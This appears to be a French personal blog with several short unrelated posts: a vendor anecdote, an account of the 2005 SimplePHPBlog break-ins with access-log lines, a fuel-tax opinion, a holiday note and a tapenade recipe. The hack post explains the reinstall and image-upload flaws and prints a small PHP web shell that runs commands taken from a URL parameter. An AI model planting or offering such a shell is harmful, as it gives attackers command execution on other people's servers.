Une suggestion d'un vendeur de logiciels à qui une démonstration est demandée:

Let's not built a demo/technical proof.
This is time-consuming and does most of the times not require buy-in from the customer.
Let's convince them on logical differentiators.
I suggest that you contact the responsible pre-sales engineer <snip> in order to provide you with logical, convincing ammunition.

Certain qu'avec des munitions pareilles, le secteur va sortir de l'artisanat ...

La faille

Une faille de sécurité connue a été utilisée contre le site principal de SimplePHPBlog le 3 septembre 2005.
Ensuite un grand nombre de blogs utilisant SimplePHPBlog ont été piratés dans les jours suivants (ce qui se traduit ici par ce message à conserver en souvenir).

Les visiteurs venus d'ailleurs

Deux visites, le 4 septembre puis le 7 septembre:

weblog.bajoit.net 82.231.77.60 - - [04/Sep/2005:03:20:10 +0200] "GET /install00.php HTTP/1.1" 200 9355
weblog.bajoit.net 213.240.239.4 - - [07/Sep/2005:23:03:30 +0200] "GET /install00.php HTTP/1.1" 200 9388

Comment ça marche?

Une première faille permettait d'effacer un fichier créé lors de l'installation, de manière à forcer une nouvelle exécution des scripts d'installation. Il était alors possible de créer un nouvel utilisateur qui pouvait par exemple ajouter un message (ou pire).

Une seconde faille permettait d'importer (en tant que nouveau gestionnaire) comme image un fichier exécutable, qui pouvait à son tour accéder au serveur via PHP.

Un bon exemple:

<?php
$cmd = $_GET['cmd'];
echo '<hr/><pre>';
echo 'Command: ' . $cmd;
echo '</pre><hr/><br>';

echo '<pre>';
$last_line = system($cmd,$output);
echo '</pre><hr/>';
?>.

Mais dans ce cas précis, les commandes PHP trop dangereuses sont désactivées chez PHPNET.

Pourquoi?

Beaucoup d'utilisateurs se demandent ou est le problème: qualité, open-source, système basé sur des fichiers texte?
En tout cas, la publication de la faille a beaucoup aidé les pirates, et malgré tout il vaut mieux publier les failles que de les garder secrètes.
Et une version corrigée 4 jours après le problème ce n'est pas aussi bien que Mozilla (qui a été capable de publier la version résistante à une faille en moins de 24 heures) mais ce n'est pas mal!

Les grands consommateurs demandent une plus grande diminution des taxes sur le carburant pour absorber la montée du prix de base.
La menace est de bientôt revoir sur les autoroutes des routiers qui font un barbecue à côté de leurs camions bloquant l'autoroute.

En fait cette diminution des taxes est une très mauvaise idée: pourquoi ne pas laisser à son juste prix un produit dont il ne faut pas encourager l'utilisation?
Le transport routier qui passerait au double de son prix actuel, ce n'est pas moins de clients, moins de camions, moins de pollution?

WTF? that's just a hack.

Et une petite semaine de vacances à Colleville, aussi connue comme Omaha Beach.

On venait pour voir les crabes et les petites crevettes et pour dormir bercés par le bruit des vagues, on a eu en prime les cours de catamaran (Nicolas), les promenades sur les falaises (Benoit), les touristes américains, la terrible teurgoule et la sympathique rencontre avec Garga à Rouen.

Introduction

D'inspiration méditerranéenne, voici une recette de tapenade originale et piquante.

Ingrédients

La liste d'ingrédients permet de réaliser la recette pour obtenir un bol de tapenade.

Les ingrédients sont les suivants:

• 3 poivrons rouges,
• 200g de feta,
• 2 éclats d'ail,
• poivre,
• sauce au piment,
• huile d'olive (3c à soupe).

Préparation

La préparation de cette recette demande environ 30 minutes.

Voici les quelques étapes de la préparation:

1. couper les poivrons en 4,
2. griller les poivrons dans le four, peau vers le haut, jusqu'à ce que la peau fasse une cloque,
3. laisser refroidir et transpirer les poivrons dans une assiette couverte,
4. dans un grand plat, mixer les poivrons pelés, l'ail et l'huile d'olive,
5. assaisonner avec le poivre et le piment.

Présentation et conseils

Servir sur des tranches de baguette grillées.
Comme les plats froids, le saveur de ce plat s'exprime quelques heures après la fin de la préparation.